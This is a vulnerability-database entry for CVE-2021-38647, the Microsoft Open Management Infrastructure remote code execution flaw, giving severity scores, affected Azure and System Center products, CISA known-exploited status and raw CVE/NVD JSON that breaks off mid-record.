Vulnerability-Lookup

CVE-2021-38647 (GCVE-0-2021-38647)

Vulnerability from cvelistv5 – Published: 2021-09-15 11:24 – Updated: 2025-10-21 23:25

CISA KEV KEVintel KEV

Title

Open Management Infrastructure Remote Code Execution Vulnerability

Summary

Open Management Infrastructure Remote Code Execution Vulnerability

Severity

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C

SSVC

Exploitation: active Automatable: yes Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

Remote Code Execution
CWE-noinfo Not enough information

Assigner

microsoft

References

3 references

URL	Tags
https://portal.msrc.microsoft.com/en-US/security-…	x_refsource_MISC
http://packetstormsecurity.com/files/164694/Micro…	x_refsource_MISC
https://www.cisa.gov/known-exploited-vulnerabilit…	government-resource

Impacted products

10 products

Vendor	Product	Version
Microsoft	Open Management Infrastructure	Affected: 16.0 , < OMI Version 1.6.8-1 (custom) cpe:2.3:a:microsoft:open_management_infrastructure::::::::
Microsoft	System Center Operations Manager (SCOM)	Affected: 1.0.0 , < OMI version: 1.6.8-1 (custom) cpe:2.3:a:microsoft:system_center_operations_manager:-:::::::*
Microsoft	Azure Automation State Configuration, DSC Extension	Affected: 2.0.0 , < DSC Agent versions: 2.71.1.25, 2.70.0.30, 3.0.0.3 (custom) cpe:2.3:a:microsoft:azure_automation_state_configuration:-:::::::*
Microsoft	Azure Automation Update Management	Affected: 1.0.0 , < OMS Agent for Linux GA v1.13.40-0 (custom) cpe:2.3:a:microsoft:azure_automation_update_management:-:::::::*
Microsoft	Log Analytics Agent	Affected: 1.0.0 , < OMS Agent for Linux GA v1.13.40-0 (custom) cpe:2.3:a:microsoft:log_analytics_agent:-:::::::*
Microsoft	Azure Diagnostics (LAD)	Affected: 3.0.0 , < LAD v4.0.13 and LAD v3.0.135 (custom) cpe:2.3:a:microsoft:azure_diagnostics::::::::
Microsoft	Container Monitoring Solution	Affected: 1.0.0 , < publication (custom) cpe:2.3:a:microsoft:container_monitoring_solution:-:::::::*
Microsoft	Azure Security Center	Affected: 1.0.0 , < OMS Agent for Linux GA v1.13.40-0 (custom) cpe:2.3:a:microsoft:azure_security_center::::::::
Microsoft	Azure Sentinel	Affected: 1.0.0 , < OMS Agent for Linux GA v1.13.40-0 (custom) cpe:2.3:a:microsoft:azure_sentinel::::::::
Microsoft	Azure Stack Hub	Affected: 1.0.0 , < Monitor, Update and Config Mgmnt 1.14.01 (custom) Affected: 1.0.0 , < 3.1.135 (custom) cpe:2.3:a:microsoft:azure_stack_hub::::::::

Date Public

2021-09-14 07:00

CISA KEV

Known Exploited Vulnerability - GCVE BCP-07 Compliant

KEV entry ID: 6924827c-800f-405c-9c5b-4b98a828336d

Vulnerability ID: CVE-2021-38647

Status: Confirmed

Status Updated: 2021-11-03 00:00 UTC

Exploited: Yes

Timestamps

First Seen: 2021-11-03

Asserted: 2021-11-03

Scope

Notes: KEV entry: Microsoft Open Management Infrastructure (OMI) Remote Code Execution Vulnerability | Affected: Microsoft / Open Management Infrastructure (OMI) | Description: Microsoft Open Management Infrastructure (OMI) within Azure VM Management Extensions contains an unspecified vulnerability allowing remote code execution. | Required action: Apply updates per vendor instructions. | Due date: 2021-11-17 | Known ransomware campaign use (KEV): Known | Notes (KEV): https://nvd.nist.gov/vuln/detail/CVE-2021-38647

Evidence

Type: Vendor Report

Signal: Successful Exploitation

Confidence: 80%

Source: cisa-kev

Details

Cwes	CWE-1390
Feed	CISA Known Exploited Vulnerabilities Catalog
Product	Open Management Infrastructure (OMI)
Due Date	2021-11-17
Date Added	2021-11-03
Vendorproject	Microsoft
Vulnerabilityname	Microsoft Open Management Infrastructure (OMI) Remote Code Execution Vulnerability
Knownransomwarecampaignuse	Known

References

CVE-2021-38647

Created: 2026-02-02 12:28 UTC | Updated: 2026-02-06 07:17 UTC

KEVintel KEV

Known Exploited Vulnerability - GCVE BCP-07 Compliant

KEV entry ID: ee8b0f78-3a5f-47cd-9bea-168c42252d56

Vulnerability ID: CVE-2021-38647

Status: Confirmed

Status Updated: 2021-11-03 00:00 UTC

Exploited: Yes

Timestamps

First Seen: 2021-11-03

Asserted: 2021-11-03

Scope

Notes: KEVIntel entry: Open Management Infrastructure Remote Code Execution Vulnerability | Affected: Microsoft / Open Management Infrastructure, System Center Operations Manager (SCOM), Azure Automation State Configuration, DSC Extension, Azure Automation Update Management, Log Analytics Agent, Azure Diagnostics (LAD), Container Monitoring Solution, Azure Security Center, Azure Sentinel, Azure Stack Hub | CVSS: 9.8 (CRITICAL) | Used in malware: yes | Not yet in CISA KEV: False

Evidence

Type: Public Report

Signal: Confirmed Compromise

Confidence: 70%

Source: kevintel

Details

Feed	KEVIntel (kevintel.com)
Title	Open Management Infrastructure Remote Code Execution Vulnerability
Vendor	Microsoft
Product	Open Management Infrastructure, System Center Operations Manager (SCOM), Azure Automation State Configuration, DSC Extension, Azure Automation Update Management, Log Analytics Agent, Azure Diagnostics (LAD), Container Monitoring Solution, Azure Security Center, Azure Sentinel, Azure Stack Hub
Added Date	2021-11-03T00:00:00.000Z
Cvss Score	9.8
Epss Score	None
Cvss Severity	CRITICAL
Epss Percentile	None
Used In Malware	yes
Ahead Of Cisa Kev	None
Not Yet In Cisa Kev	False

References

Created: 2026-06-19 12:47 UTC | Updated: 2026-06-19 12:47 UTC

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T01:51:18.937Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2021-38647",
                "options": [
                  {
                    "Exploitation": "active"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-04T14:45:47.017000Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          },
          {
            "other": {
              "content": {
                "dateAdded": "2021-11-03",
                "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-38647"
              },
              "type": "kev"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-21T23:25:33.144Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "government-resource"
            ],
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-38647"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2021-11-03T00:00:00.000Z",
            "value": "CVE-2021-38647 added to CISA KEV"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "cpes": [
            "cpe:2.3:a:microsoft:open_management_infrastructure:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Open Management Infrastructure",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMI Version 1.6.8-1",
              "status": "affected",
              "version": "16.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:system_center_operations_manager:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "System Center Operations Manager (SCOM)",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMI version: 1.6.8-1",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Automation State Configuration, DSC Extension",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "DSC Agent versions: 2.71.1.25, 2.70.0.30, 3.0.0.3",
              "status": "affected",
              "version": "2.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_automation_update_management:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Automation Update Management",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMS Agent for Linux GA v1.13.40-0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:log_analytics_agent:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Log Analytics Agent",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMS Agent for Linux GA v1.13.40-0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_diagnostics:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Diagnostics (LAD)",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "LAD v4.0.13 and LAD v3.0.135",
              "status": "affected",
              "version": "3.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:container_monitoring_solution:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Container Monitoring Solution",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_security_center:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Security Center",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMS Agent for Linux GA v1.13.40-0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_sentinel:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Sentinel",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMS Agent for Linux GA v1.13.40-0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_stack_hub:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Stack Hub",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "Monitor, Update and Config Mgmnt 1.14.01",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            },
            {
              "lessThan": "3.1.135",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "datePublic": "2021-09-14T07:00:00.000Z",
      "descriptions": [
        {
          "lang": "en-US",
          "value": "Open Management Infrastructure Remote Code Execution Vulnerability"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en-US",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Remote Code Execution",
              "lang": "en-US",
              "type": "Impact"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-12-28T19:37:20.007Z",
        "orgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
        "shortName": "microsoft"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html"
        }
      ],
      "title": "Open Management Infrastructure Remote Code Execution Vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
    "assignerShortName": "microsoft",
    "cveId": "CVE-2021-38647",
    "datePublished": "2021-09-15T11:24:07.000Z",
    "dateReserved": "2021-08-13T00:00:00.000Z",
    "dateUpdated": "2025-10-21T23:25:33.144Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "cisa_known_exploited": {
      "cveID": "CVE-2021-38647",
      "cwes": "[\"CWE-1390\"]",
      "dateAdded": "2021-11-03",
      "dueDate": "2021-11-17",
      "knownRansomwareCampaignUse": "Known",
      "notes": "https://nvd.nist.gov/vuln/detail/CVE-2021-38647",
      "product": "Open Management Infrastructure (OMI)",
      "requiredAction": "Apply updates per vendor instructions.",
      "shortDescription": "Microsoft Open Management Infrastructure (OMI) within Azure VM Management Extensions contains an unspecified vulnerability allowing remote code execution.",
      "vendorProject": "Microsoft",
      "vulnerabilityName": "Microsoft Open Management Infrastructure (OMI) Remote Code Execution Vulnerability"
    },
    "epss": {
      "cve": "CVE-2021-38647",
      "date": "2026-06-20",
      "epss": "0.99723",
      "percentile": "0.99951"
    },
    "fkie_nvd": {
      "cisaActionDue": "2021-11-17",
      "cisaExploitAdd": "2021-11-03",
      "cisaRequiredAction": "Apply updates per vendor instructions.",
      "cisaVulnerabilityName": "Microsoft Open Management Infrastructure (OMI) Remote Code Execution Vulnerability",
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"DEC617A6-F1BC-44DE-A9BB-BECF2E788B0E\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:microsoft:azure_automation_update_management:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"23A8B342-E863-4C71-9CE1-FB325FF34829\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:microsoft:azure_diagnostics_\\\\(lad\\\\):-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"37AC51D6-F6F3-45D8-91E7-6EDD01C0273E\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:microsoft:azure_open_management_infrastructure:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"8477F336-71BB-4C49-A4EB-E1BC1EFF2F49\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:microsoft:azure_security_center:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"BA1626DA-5B19-4291-B840-633EF458984C\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:microsoft:azure_sentinel:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"B80F8C3B-BEF9-43D5-9455-6C6F608CF519\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:microsoft:azure_stack_hub:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"B457DA44-AD83-4E5C-B180-8A227462EC60\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:microsoft:container_monitoring_solution:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"68A461E8-C834-4F97-98E3-516A191A3BAA\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:microsoft:log_analytics_agent:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"FDAE892B-324C-45E3-BFA0-C2B7B6939F54\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:microsoft:system_center_operations_manager:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"79983385-D5FE-4F76-924C-A2AA7E5BAAE8\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Open Management Infrastructure Remote Code Execution Vulnerability\"}, {\"lang\": \"es\", \"value\": \"Una Vulnerabilidad de Ejecuci\\u00f3n de C\\u00f3digo Remota de Open Management Infrastructure\"}]",
      "id": "CVE-2021-38647",
      "lastModified": "2024-11-21T06:17:48.663",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"secure@microsoft.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}, {\"source\": \"nvd@nist.gov\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:N/C:P/I:P/A:P\", \"baseScore\": 7.5, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"PARTIAL\", \"integrityImpact\": \"PARTIAL\", \"availabilityImpact\": \"PARTIAL\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 10.0, \"impactScore\": 6.4, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2021-09-15T12:15:15.090",
      "references": "[{\"url\": \"http://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html\", \"source\": \"secure@microsoft.com\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647\", \"source\": \"secure@microsoft.com\", \"tags\": [\"Patch\", \"Vendor Advisory\"]}, {\"url\": \"http://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\", \"Vendor Advisory\"]}]",
      "sourceIdentifier": "secure@microsoft.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-287\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2021-38647\",\"sourceIdentifier\":\"secure@microsoft.com\",\"published\":\"2021-09-15T12:15:15.090\",\"lastModified\":\"2025-10-30T19:13:53.830\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open Management Infrastructure Remote Code Execution Vulnerability\"},{\"lang\":\"es\",\"value\":\"Una Vulnerabilidad de Ejecuci\u00f3n de C\u00f3digo Remota de Open Management Infrastructure\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"secure@microsoft.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":7.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"cisaExploitAdd\":\"2021-11-03\",\"cisaActionDue\":\"2021-11-17\",\"cisaRequiredAction\":\"Apply updates per vendor instructions.\",\"cisaVulnerabilityName\":\"Microsoft Open Management Infrastructure (OMI) Remote Code Execution Vulnerability\",\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-noinfo\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DEC617A6-F1BC-44DE-A9BB-BECF2E788B0E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microsoft:azure_automation_update_management:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"23A8B342-E863-4C71-9CE1-FB325FF34829\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microsoft:azure_diagnostics_\\\\(lad\\\\):-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"37AC51D6-F6F3-45D8-91E7-6EDD01C0273E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microsoft:azure_open_management_infrastructure:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8477F336-71BB-4C49-A4EB-E1BC1EFF2F49\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microsoft:azure_security_center:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BA1626DA-5B19-4291-B840-633EF458984C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microsoft:azure_sentinel:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B80F8C3B-BEF9-43D5-9455-6C6F608CF519\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microsoft:azure_stack_hub:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B457DA44-AD83-4E5C-B180-8A227462EC60\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microsoft:container_monitoring_solution:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"68A461E8-C834-4F97-98E3-516A191A3BAA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microsoft:log_analytics_agent:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FDAE892B-324C-45E3-BFA0-C2B7B6939F54\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microsoft:system_center_operations_manager:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"79983385-D5FE-4F76-924C-A2AA7E5BAAE8\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Patch\",\"Vendor Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Vendor Advisory\"]},{\"url\":\"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-38647\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"US Government Resource\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"http://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-04T01:51:18.937Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2021-38647\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"active\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-02-04T14:45:47.017000Z\"}}}, {\"other\": {\"type\": \"kev\", \"content\": {\"dateAdded\": \"2021-11-03\", \"reference\": \"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-38647\"}}}], \"timeline\": [{\"lang\": \"en\", \"time\": \"2021-11-03T00:00:00.000Z\", \"value\": \"CVE-2021-38647 added to CISA KEV\"}], \"references\": [{\"url\": \"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-38647\", \"tags\": [\"government-resource\"]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"description\": \"CWE-noinfo Not enough information\"}]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-02-04T14:45:35.962Z\"}}], \"cna\": {\"title\": \"Open Management Infrastructure Remote Code Execution Vulnerability\", \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"version\": \"3.1\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C\"}, \"scenarios\": [{\"lang\": \"en-US\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:microsoft:open_management_infrastructure:*:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Open Management Infrastructure\", \"versions\": [{\"status\": \"affected\", \"version\": \"16.0\", \"lessThan\": \"OMI Version 1.6.8-1\", \"versionType\": \"custom\"}], \"platforms\": [\"Unknown\"]}, {\"cpes\": [\"cpe:2.3:a:microsoft:system_center_operations_manager:-:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"System Center Operations Manager (SCOM)\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.0.0\", \"lessThan\": \"OMI version: 1.6.8-1\", \"versionType\": \"custom\"}], \"platforms\": [\"Unknown\"]}, {\"cpes\": [\"cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Azure Automation State Configuration, DSC Extension\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.0.0\", \"lessThan\": \"DSC Agent versions: 2.71.1.25, 2.70.0.30, 3.0.0.3\", \"versionType\": \"custom\"}], \"platforms\": [\"Unknown\"]}, {\"cpes\": [\"cpe:2.3:a:microsoft:azure_automation_update_management:-:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Azure Automation Update Management\", \"versions\": [{\"status\": 